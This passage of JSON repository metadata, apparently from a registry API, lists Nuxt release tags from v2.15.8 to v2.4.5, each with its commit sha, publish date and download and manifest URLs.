21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4